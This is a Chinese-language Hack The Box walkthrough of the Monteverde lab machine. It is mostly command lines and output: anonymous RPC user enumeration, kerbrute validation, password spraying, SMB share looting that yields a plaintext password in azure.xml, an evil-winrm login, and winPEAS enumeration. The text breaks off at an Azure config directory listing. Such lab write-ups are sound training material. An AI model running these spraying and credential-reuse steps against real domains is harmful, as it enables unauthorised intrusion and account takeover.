Monteverde-htb-writeup

0x00 靶场技能介绍

章节技能:RPC服务获取域用户ID、弱密码、SMB匿名登录、敏感信息泄露、密码账号枚举、Azure Admins、Azure AD Connect

参考链接:https://0xdf.gitlab.io/2020/06/13/htb-monteverde.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.172

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-11 23:11 CST
Nmap scan report for 10.10.10.172
Host is up (0.14s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49736/tcp open  unknown
55252/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 20.42 seconds
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49736,55252,                           

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49736,55252 --min-rate=10000 -sC -sV 10.10.10.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-11 23:13 CST
Nmap scan report for 10.10.10.172
Host is up (0.11s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-11 07:10:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49736/tcp open  msrpc         Microsoft Windows RPC
55252/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-11T07:11:10
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -8h03m31s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.05 seconds

3、经过枚举,发现rpc服务可以匿名获取一些用户信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
┌──(kali㉿offsec)-[~/Desktop]
└─$ rpcclient -U "" -N 10.10.10.172
rpcclient $>
rpcclient $> getusername
Account Name: ANONYMOUS LOGON, Authority Name: NT AUTHORITY
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $> lookupnames Guest
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
rpcclient $> getdcname
Usage: getdcname domainname
rpcclient $> lsaquery
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomains
name:[MEGABANK] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $> querydominfo
Domain:         MEGABANK
Server:
Comment:
Total Users:    51
Total Groups:   0
Total Aliases:  23
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
rpcclient $>

4、下面直接枚举用户名并使用正则并提取出来用户名ID

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿offsec)-[~/Desktop]
└─$ rpcclient -U "" -N 10.10.10.172 -c "enumdomusers" | grep -oP "\[.*?\]" | grep -v 0x | tr -d "[]" > users

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat users         
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

5、这里其实除了使用rpcclient工具,也可以使用rpcenum工具进行枚举的,下面举例一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ sudo ./rpcenum -i 10.10.10.172 -e All
[sudo] kali 的密码:

[*] Enumerating Domain Users...

  +                   +
  | Users             |
  +                   +
  | Guest             |
  | AAD_987d7f2f57d2  |
  | mhope             |
  | SABatchJobs       |
  | svc-ata           |
  | svc-bexec         |
  | svc-netapp        |
  | dgalanos          |
  | roleary           |
  | smorgan           |
  +                   +

[*] Listing domain users with description...

  +                   +                                                                                                                                                    +
  | User              | Description                                                                                                                                        |
  +                   +                                                                                                                                                    +
  | Guest             | Built-in account for guest access to the computer/domain                                                                                           |
  | AAD_987d7f2f57d2  | Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.  |
  +                   +                                                                                                                                                    +

[*] Enumerating Domain Admin Users...

  +                   +
  | DomainAdminUsers  |
  +                   +

[*] Enumerating Domain Groups...

  +                                          +                                                                                                                   +
  | DomainGroup                              | Description                                                                                                       |
  +                                          +                                                                                                                   +
  | Enterprise Read-only Domain Controllers  | Members of this group are Read-Only Domain Controllers in the enterprise                                          |
  | Domain Users                             | All domain users                                                                                                  |
  | Domain Guests                            | All domain guests                                                                                                 |
  | Domain Computers                         | All workstations and servers joined to the domain                                                                 |
  | Group Policy Creator Owners              | Members in this group can modify group policy for the domain                                                      |
  | Cloneable Domain Controllers             | Members of this group that are domain controllers may be cloned.                                                  |                      
  | Protected Users                          | Members of this group are afforded additional protections against authentication security threats. See http       |                      
  | DnsUpdateProxy                           | DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).  |                      
  | Azure Admins                             |                                                                                                                   |                      
  | File Server Admins                       |                                                                                                                   |                      
  | Call Recording Admins                    |                                                                                                                   |                      
  | Reception                                |                                                                                                                   |                      
  | Operations                               |                                                                                                                   |                      
  | Trading                                  |                                                                                                                   |                      
  | HelpDesk                                 |                                                                                                                   |                      
  | Developers                               |                                                                                                                   |                      
  +                                          +                                                                                                                   +

6、下面我我们在绑定下本地hosts域名信息后,使用kerbrute工具验证下域用户是否都存在

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo ntpdate 10.10.10.172
[sudo] kali 的密码:
2024-05-11 15:48:55.823244 (+0800) -28784.200210 +/- 0.064667 10.10.10.172 s1 no-leap
CLOCK: time stepped by -28784.200210

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.172 MEGABANK.LOCAL" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.172 MEGABANK.LOCAL

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./kerbrute userenum -d MEGABANK.LOCAL --dc 10.10.10.172 ../users   

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 05/11/24 - Ronnie Flathers @ropnop

2024/05/11 16:04:04 >  Using KDC(s):
2024/05/11 16:04:04 >   10.10.10.172:88

2024/05/11 16:04:04 >  [+] VALID USERNAME:       AAD_987d7f2f57d2@MEGABANK.LOCAL
2024/05/11 16:04:04 >  [+] VALID USERNAME:       mhope@MEGABANK.LOCAL
2024/05/11 16:04:04 >  [+] VALID USERNAME:       svc-bexec@MEGABANK.LOCAL
2024/05/11 16:04:04 >  [+] VALID USERNAME:       svc-netapp@MEGABANK.LOCAL
2024/05/11 16:04:04 >  [+] VALID USERNAME:       svc-ata@MEGABANK.LOCAL
2024/05/11 16:04:04 >  [+] VALID USERNAME:       smorgan@MEGABANK.LOCAL
2024/05/11 16:04:04 >  [+] VALID USERNAME:       SABatchJobs@MEGABANK.LOCAL
2024/05/11 16:04:04 >  [+] VALID USERNAME:       roleary@MEGABANK.LOCAL
2024/05/11 16:04:04 >  [+] VALID USERNAME:       dgalanos@MEGABANK.LOCAL
2024/05/11 16:04:04 >  Done! Tested 10 usernames (9 valid) in 0.138 seconds

7、发现大部分用户ID都在,只有1个用户账号不在。

8、下面尝试下密码复用枚举,看看这些密码中是否有弱密码的

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.172 -u ./users  -p users --continue-on-success
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE 
......
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:svc-ata STATUS_LOGON_FAILURE 
......
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan:smorgan STATUS_LOGON_FAILURE

9、发现了1个,羡慕尝试 winrm 和 smb 协议,看看是否可以登录。

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p 'SABatchJobs'
SMB         10.10.10.172    5985   MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP        10.10.10.172    5985   MONTEVERDE       [*] http://10.10.10.172:5985/wsman
WINRM       10.10.10.172    5985   MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:SABatchJobs

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.172 -u SABatchJobs -p SABatchJobs
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs

10、只有smb服务可以登录,那就看看有哪些SMB目录可以访问吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -u SABatchJobs -p SABatchJobs -H 10.10.10.172 

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.172:445        Name: MEGABANK.LOCAL            Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        azure_uploads                                           READ ONLY
        C$                                                      NO ACCESS       Default share
        E$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        users$                                                  READ ONLY

11、还是有些目录是可读的,羡慕尝试枚举下看看,有哪些有意思的文件吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\azure_uploads
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 20:43:06 2020
  ..                                  D        0  Fri Jan  3 20:43:06 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \> exit
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\NETLOGON     
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 06:05:14 2020
  ..                                  D        0  Fri Jan  3 06:05:14 2020

                5024511 blocks of size 4096. 803691 blocks available
smb: \> exit
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\SYSVOl  
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 06:05:14 2020
  ..                                  D        0  Fri Jan  3 06:05:14 2020
  MEGABANK.LOCAL                     Dr        0  Fri Jan  3 06:05:14 2020

                5024511 blocks of size 4096. 803691 blocks available
smb: \> cd MEGABANK.LOCAL
smb: \MEGABANK.LOCAL\> ls
  .                                   D        0  Fri Jan  3 06:11:34 2020
  ..                                  D        0  Fri Jan  3 06:11:34 2020
  DfsrPrivate                      DHSr        0  Fri Jan  3 06:11:34 2020
  Policies                            D        0  Fri Jan  3 06:05:22 2020
  scripts                             D        0  Fri Jan  3 06:05:14 2020

                5024511 blocks of size 4096. 803691 blocks available
smb: \MEGABANK.LOCAL\>exit


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\users$
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 21:12:48 2020
  ..                                  D        0  Fri Jan  3 21:12:48 2020
  dgalanos                            D        0  Fri Jan  3 21:12:30 2020
  mhope                               D        0  Fri Jan  3 21:41:18 2020
  roleary                             D        0  Fri Jan  3 21:10:30 2020
  smorgan                             D        0  Fri Jan  3 21:10:24 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \> 


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\users$
Try "help" to get a list of possible commands.
smb: \> cd dgalanos
smb: \dgalanos\> ls
  .                                   D        0  Fri Jan  3 21:12:30 2020
  ..                                  D        0  Fri Jan  3 21:12:30 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \dgalanos\> cd ../mhope
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 21:41:18 2020
  ..                                  D        0  Fri Jan  3 21:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 21:40:23 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \mhope\> cd ../roleary
smb: \roleary\> ls
  .                                   D        0  Fri Jan  3 21:10:30 2020
  ..                                  D        0  Fri Jan  3 21:10:30 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \roleary\> cd ../smorgan
smb: \smorgan\> ls
  .                                   D        0  Fri Jan  3 21:10:24 2020
  ..                                  D        0  Fri Jan  3 21:10:24 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \smorgan\> exit

12、这里发现了一个文件,经过查看,发现里面有个默认密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat azure.xml 
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

13、开始使用该密码进行枚举验证是哪些用户的密码

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.172 -u users -p '4n0therD4y@n0th3r$' --continue-on-success
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-netapp:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\dgalanos:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE

14、查看该用户是否可以winrm协议

1
2
3
4
5
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'             
SMB         10.10.10.172    5985   MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP        10.10.10.172    5985   MONTEVERDE       [*] http://10.10.10.172:5985/wsman
WINRM       10.10.10.172    5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)

15、可以,那就获取第一个flag信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls


    Directory: C:\Users\mhope\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/10/2024  11:57 PM             34 user.txt


*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
07a4bb734a0ae8190569915469c443e0
*Evil-WinRM* PS C:\Users\mhope\Desktop>

0x02 系统权限获取

16、我们开始简单的枚举一下用户权限和用户组之类的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
*Evil-WinRM* PS C:\Users\mhope\Desktop> net user

User accounts for \\

-------------------------------------------------------------------------------
AAD_987d7f2f57d2         Administrator            dgalanos
Guest                    krbtgt                   mhope
roleary                  SABatchJobs              smorgan
svc-ata                  svc-bexec                svc-netapp
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\mhope\Desktop> net group

Group Accounts for \\

-------------------------------------------------------------------------------
*Azure Admins
*Call Recording Admins
*Cloneable Domain Controllers
*Developers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*File Server Admins
*Group Policy Creator Owners
*HelpDesk
*Key Admins
*Operations
*Protected Users
*Read-only Domain Controllers
*Reception
*Schema Admins
*Trading
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\mhope\Desktop> net user mhope
User name                    mhope
Full Name                    Mike Hope
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/2/2020 4:40:05 PM
Password expires             Never
Password changeable          1/3/2020 4:40:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory               \\monteverde\users$\mhope
Last logon                   5/11/2024 1:54:49 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Azure Admins         *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\mhope\Desktop> net group "Azure Admins"
Group name     Azure Admins
Comment

Members

-------------------------------------------------------------------------------
AAD_987d7f2f57d2         Administrator            mhope
The command completed successfully.

*Evil-WinRM* PS C:\Users\mhope\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\mhope\Desktop>

17、发现了一个特殊的云组,但是我这里先搁置下,继续上工具枚举下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
*Evil-WinRM* PS C:\Users\mhope\Documents> upload /home/kali/Desktop/tools/winPEASx64.exe ../Desktop
                                        
Info: Uploading /home/kali/Desktop/tools/winPEASx64.exe to C:\Users\mhope\Documents\..\Desktop
                                        
Data: 3183272 bytes of 3183272 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls


    Directory: C:\Users\mhope\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/10/2024  11:57 PM             34 user.txt
-a----        5/11/2024   2:04 AM        2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\mhope\Desktop> ./winPEASx64.exe


   Computer Name           :   MONTEVERDE
   User Name               :   AAD_987d7f2f57d2
   User Id                 :   1104
   Is Enabled              :   True
   User Type               :   User
   Comment                 :   Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
   Last Logon              :   5/10/2024 11:59:00 PM
   Logons Count            :   11
   Password Last Set       :   1/2/2020 3:53:24 PM


   Computer Name           :   MONTEVERDE
   User Name               :   svc-ata
   User Id                 :   2603
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/3/2020 5:58:31 AM


   Computer Name           :   MONTEVERDE
   User Name               :   svc-bexec
   User Id                 :   2604
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/3/2020 5:59:55 AM


   Computer Name           :   MONTEVERDE
   User Name               :   svc-netapp
   User Id                 :   2605
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/3/2020 6:01:42 AM


   Computer Name           :   MONTEVERDE
   User Name               :   dgalanos
   User Id                 :   2613
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/3/2020 6:06:10 AM


   Computer Name           :   MONTEVERDE
   User Name               :   roleary
   User Id                 :   2614
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/3/2020 6:08:05 AM


   Computer Name           :   MONTEVERDE
   User Name               :   smorgan
   User Id                 :   2615
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/3/2020 6:09:21 AM



https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
    C:\Users\mhope\.azure\TokenCache.dat (Azure Token Cache)
    Accessed:1/3/2020 5:36:14 AM -- Size:7896                                                                                                                                           

    C:\Users\mhope\.azure\AzureRMContext.json (Azure RM Context)
    Accessed:1/3/2020 5:35:57 AM -- Size:2794

18、没太大的信息,不过在当前用户目录下发现了几个云配置的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
*Evil-WinRM* PS C:\Users\mhope\Desktop> cd C:\Users\mhope\.azure\
*Evil-WinRM* PS C:\Users\mhope\.azure> ls


    Directory: C:\Users\mhope\.azure


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                ErrorRecords
-a----         1/3/2020   5:31 AM             34 AzurePSDataCollectionProfile.json
-a----         1/3/2020   5:35 AM           2794 AzureRmContext.json
-a----         1/3/2020   5:31 AM            191 AzureRmContextSettings.json
-a----         1/3/2020   5:36 AM           7896 TokenCache.dat


